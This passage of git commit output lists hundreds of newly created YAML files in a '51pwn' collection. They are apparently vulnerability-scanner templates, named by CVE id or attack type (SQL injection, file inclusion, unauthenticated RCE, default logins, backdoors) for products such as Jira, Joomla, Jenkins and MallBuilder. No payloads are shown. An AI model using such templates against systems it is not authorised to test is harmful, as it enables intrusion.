config/51pwn/yaml/Jellyfin/CVE-2021-29490.yaml create mode 100755 config/51pwn/yaml/Jenkins/CVE-2018-1000600.yaml create mode 100755 config/51pwn/yaml/Jenkins/CVE-2018-1000861.yaml create mode 100755 config/51pwn/yaml/Jenkins/CVE-2019-10405.yaml create mode 100755 config/51pwn/yaml/Jenkins/CVE-2019-10475.yaml create mode 100755 config/51pwn/yaml/Jenkins/CVE-2020-2096.yaml create mode 100755 config/51pwn/yaml/Jenkins/CVE-2020-2103.yaml create mode 100755 config/51pwn/yaml/Jenkins/CVE-2020-2140.yaml create mode 100755 config/51pwn/yaml/Jenkins/jenkins-unauthorized-access.yaml create mode 100755 config/51pwn/yaml/Jenkins/jenkins-weak-password.yaml create mode 100755 config/51pwn/yaml/Jenzabar/CVE-2021-26723.yaml create mode 100755 config/51pwn/yaml/Jetty/CVE-2015-2080.yaml create mode 100755 config/51pwn/yaml/Jetty/CVE-2021-28164.yaml create mode 100755 config/51pwn/yaml/Jetty/CVE-2021-28169.yaml create mode 100755 config/51pwn/yaml/Jetty/CVE-2021-34429.yaml create mode 100755 config/51pwn/yaml/Jinher oa/jinher-oa-default-login.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2007-0885.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2017-9506.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2018-5230.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-11581.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-3401.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-3402.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-3403.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-8442.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-8446.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-8449.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2019-8451.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2020-14179.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2020-14181.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2020-29453.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2020-36289.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2021-26086.yaml create mode 100755 config/51pwn/yaml/Jira/CVE-2022-0540.yaml create mode 100755 config/51pwn/yaml/Jolokia/CVE-2018-1000129.yaml create mode 100755 config/51pwn/yaml/Jolokia/CVE-2018-1000130.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2007-4504.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2008-4668.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2008-4764.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2008-6080.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2008-6172.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2008-6222.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2009-1496.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2009-2015.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2009-2100.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2009-3053.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2009-3318.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2009-4202.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2009-4679.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0157.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0467.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0696.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0759.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0942.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0943.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0944.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0972.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0982.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-0985.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1056.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1081.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1217.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1219.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1302.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1304.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1305.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1306.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1307.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1308.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1312.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1313.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1314.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1315.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1340.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1345.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1352.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1353.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1354.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1461.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1469.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1470.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1471.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1472.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1473.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1474.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1475.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1476.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1478.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1491.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1494.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1495.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1531.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1532.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1533.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1534.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1535.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1540.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1601.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1602.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1603.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1607.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1653.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1657.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1658.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1659.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1714.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1715.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1717.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1718.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1719.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1722.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1723.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1858.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1875.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1878.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1952.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1953.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1954.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1955.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1956.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1957.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1977.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1979.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1980.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1981.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1982.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-1983.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2033.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2034.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2035.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2036.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2037.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2045.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2050.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2122.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2128.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2259.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2507.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2680.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2682.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2857.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2918.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-2920.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-3203.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-3426.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-4282.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-4617.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-4719.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-4769.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-4977.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-5028.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2010-5286.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2011-4804.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2015-7297.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2017-8917.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2018-17254.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2018-6008.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2020-23972.yaml create mode 100755 config/51pwn/yaml/Joomla/CVE-2021-28377.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-Database-download.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-LFD-s5_media_player.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-SQLi-com_rbids.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-Upload-media.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-lfd-cckjseblod.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-lfd-contushdvideoshare.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-lfi-com_joomanager.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-aceftp.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_blog_calendar.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_ebcontent.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_fastball.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_fields.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_gallery_wd.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_jobgroklist.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_rand.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_rpl.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_sponsorwall.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_training.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-com_vikbooking.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-googlesearch.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-sqli-registrationpro.yaml create mode 100755 config/51pwn/yaml/Joomla/Joomla-upload-com_myblog.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-14263.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-20343.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-22403.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-34637.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-34754.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-35220.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-35246.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-37620.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-37773.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-37774.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-39879.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41322.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41323.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41327.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41328.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41362.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41368.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41371.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41372.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41379.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41384_2.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41385.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41386.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41388.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41399.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41496.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-41500.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-44160.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-45476.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-45930.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-46219.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-46225.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-46227.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-46228.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-46229.yaml create mode 100755 config/51pwn/yaml/Joomla/exploits-47249.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-com-fabrik-lfi.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-config-dist-file.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-file-listing.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-htaccess-file.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-jvehicles-lfi.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-manifest-file.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-K2.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-com_fss.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-com_job.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-com_jobprofile.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-com_pccookbook.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-com_people.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-com_redshop.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-com_s5clanroster.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-vnmshop.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-sqli-weblinks_categories.yaml create mode 100755 config/51pwn/yaml/Joomla/joomla-unserialized-user_agent.yaml create mode 100755 config/51pwn/yaml/Joomla/rusty-joomla.yaml create mode 100755 config/51pwn/yaml/Joomla/ssvid-19358.yaml create mode 100755 config/51pwn/yaml/Joomla/svid-90196.yaml create mode 100755 config/51pwn/yaml/Joyent Node.js/CVE-2014-3744.yaml create mode 100755 config/51pwn/yaml/Joyent Node.js/CVE-2015-5688.yaml create mode 100755 config/51pwn/yaml/Joyent Node.js/CVE-2017-14849.yaml create mode 100755 config/51pwn/yaml/Joyent Node.js/CVE-2018-3714.yaml create mode 100755 config/51pwn/yaml/Joyent Node.js/CVE-2021-21315.yaml create mode 100755 "config/51pwn/yaml/JumpServer\345\240\241\345\236\222\346\234\272/jumpserver-unauth-rce.yaml" create mode 100755 config/51pwn/yaml/Jupyter/jupyter-ipython-unauth.yaml create mode 100755 config/51pwn/yaml/Jupyter/jupyter-notebook-UnauthorizedAccess.yaml create mode 100755 config/51pwn/yaml/KLog/CVE-2020-35729.yaml create mode 100755 config/51pwn/yaml/KONGA/CVE-2021-44103.yaml create mode 100755 config/51pwn/yaml/KR-Web/CVE-2009-4223.yaml create mode 100755 config/51pwn/yaml/Kafka/kafka-center-default-login.yaml create mode 100755 config/51pwn/yaml/Kentico CMS/CVE-2015-7823.yaml create mode 100755 config/51pwn/yaml/Kentico CMS/CVE-2019-10068.yaml create mode 100755 config/51pwn/yaml/Keycloak/CVE-2020-10770.yaml create mode 100755 config/51pwn/yaml/Kibana/CVE-2018-17246.yaml create mode 100755 config/51pwn/yaml/Kibana/CVE-2019-7609.yaml create mode 100755 config/51pwn/yaml/Kibana/kibana-unauth.yaml create mode 100755 config/51pwn/yaml/KindEditor/CVE-2019-7543.yaml create mode 100755 config/51pwn/yaml/Kirona/CVE-2019-17503.yaml create mode 100755 config/51pwn/yaml/Knowage/CVE-2021-30213.yaml create mode 100755 config/51pwn/yaml/Kodi/CVE-2017-5982.yaml create mode 100755 config/51pwn/yaml/Kong/CVE-2020-11710.yaml create mode 100755 config/51pwn/yaml/Kramer/CVE-2021-36356.yaml create mode 100755 "config/51pwn/yaml/Kyan \347\275\221\347\273\234\347\233\221\346\216\247\350\256\276\345\244\207/kyan-credential-exposure.yaml" create mode 100755 config/51pwn/yaml/Kyocera/CVE-2020-23575.yaml create mode 100755 config/51pwn/yaml/LDAP/CVE-2021-29156.yaml create mode 100755 config/51pwn/yaml/LG NAS/CVE-2018-10818.yaml create mode 100755 config/51pwn/yaml/LISTSERV/CVE-2019-15501.yaml create mode 100755 config/51pwn/yaml/LabKey Server/CVE-2019-3911.yaml create mode 100755 config/51pwn/yaml/LabKey Server/CVE-2019-3912.yaml create mode 100755 config/51pwn/yaml/Lanproxy/CVE-2021-3019.yaml create mode 100755 config/51pwn/yaml/Lansweeper/CVE-2019-13462.yaml create mode 100755 config/51pwn/yaml/Lantronix/CVE-2021-21881.yaml create mode 100755 config/51pwn/yaml/Laravel/CVE-2021-3129.yaml create mode 100755 config/51pwn/yaml/Laravel/laravel-debug-enabled.yaml create mode 100755 config/51pwn/yaml/Laravel/laravel-env.yaml create mode 100755 config/51pwn/yaml/Laravel/laravel-filemanager.yaml create mode 100755 config/51pwn/yaml/Laravel/laravel-ignition-xss.yaml create mode 100755 config/51pwn/yaml/Laravel/laravel-log-file.yaml create mode 100755 config/51pwn/yaml/Laravel/laravel-telescope.yaml create mode 100755 config/51pwn/yaml/Layer5 Meshery/CVE-2021-31856.yaml create mode 100755 config/51pwn/yaml/Liferay Portal/CVE-2020-7961.yaml create mode 100755 config/51pwn/yaml/LimeSurvey/CVE-2020-11455.yaml create mode 100755 config/51pwn/yaml/Linear eMerge/CVE-2019-7254.yaml create mode 100755 config/51pwn/yaml/Linear eMerge/CVE-2019-7256.yaml create mode 100755 config/51pwn/yaml/Linksys WVC54GCA/CVE-2009-1558.yaml create mode 100755 config/51pwn/yaml/Linksys/CVE-2020-35713.yaml create mode 100755 config/51pwn/yaml/LinuxKI/CVE-2020-7209.yaml create mode 100755 config/51pwn/yaml/Lionwiki/CVE-2020-27191.yaml create mode 100755 config/51pwn/yaml/LiveZilla Server/CVE-2019-12962.yaml create mode 100755 config/51pwn/yaml/LogonTracer/CVE-2018-16167.yaml create mode 100755 config/51pwn/yaml/Lotus Core CMS/CVE-2020-8641.yaml create mode 100755 config/51pwn/yaml/Loytec LGATE-902/CVE-2018-14916.yaml create mode 100755 config/51pwn/yaml/Lucee Server/CVE-2021-21307.yaml create mode 100755 config/51pwn/yaml/LumisXP/CVE-2021-27931.yaml create mode 100755 config/51pwn/yaml/MODx/CVE-2010-5278.yaml create mode 100755 "config/51pwn/yaml/MPSec ISG1000\345\256\211\345\205\250\347\275\221\345\205\263\344\272\247\345\223\201/mpsec-lfi.yaml" create mode 100755 config/51pwn/yaml/Maccms/CNVD-2018-01089.yaml create mode 100755 config/51pwn/yaml/Maccms/maccms-rce.yaml create mode 100755 config/51pwn/yaml/Maccms/maccmsv10-backdoo.yaml create mode 100755 config/51pwn/yaml/Maccms/maccmsv10-backdoor.yaml create mode 100755 config/51pwn/yaml/Magento/CVE-2015-2067.yaml create mode 100755 config/51pwn/yaml/Magento/CVE-2015-2068.yaml create mode 100755 config/51pwn/yaml/Magmi/CVE-2017-7391.yaml create mode 100755 config/51pwn/yaml/Magmi/CVE-2020-5776.yaml create mode 100755 config/51pwn/yaml/Magmi/CVE-2020-5777.yaml create mode 100755 config/51pwn/yaml/Maian Script World Maian Cart/CVE-2021-32172.yaml create mode 100755 config/51pwn/yaml/Majordomo/CVE-2011-0049.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-404_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-Change_statusPHP-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-Index-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-List_brand-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-Message_Product_Payment-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-Product-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-Product_Shop-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-aboutus_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-aboutus_type-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-ad_name-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-add_brand_user_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_activity_product_list_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_buyorder_deid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_buyorder_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_deliver_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_logistics_temp_deid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_logistics_temp_edit-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_member_editid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_message_det_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_message_list_delbox_did-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_message_list_delbox_rid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_message_list_inbox_did-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_message_sed_uid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_product_count_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_receipt_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_return_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_security_editid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_shop_consult_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_start_addr_deid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_start_addr_fid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_start_addr_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-admin_start_addr_tid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-adv_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-ajax_back_end_user-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-announcement_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-announcement_delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-announcement_detail_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-bank_account_deid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-bank_account_mod_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-bank_deid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-bank_name-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-brand_cat_delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-brand_cat_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-brand_delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-cards_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-cards_delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-cat_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-comment_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-consult_k-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-consult_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-cpmod_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-fast_mail_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-feedback_deid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-feedback_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-feedbackd_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-hy_feedback_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-list_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-list_province-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-list_ptype-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-list_type-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-login_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-lostpass_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-lostpass_md5-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-lostpass_userid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-match_id-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-membermod_userid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-message_admin_message_sed_uid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-notice_template_type-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-order_detailPHP_oid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-order_detail_oid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-orderby_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-pluginphp-FileRead.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-points_cat_delid-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-points_chk-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-product_list_key-SQLi.yaml create mode 100755 config/51pwn/yaml/MallBuilder/Mallbuilder-property_chk-SQLi.yaml create 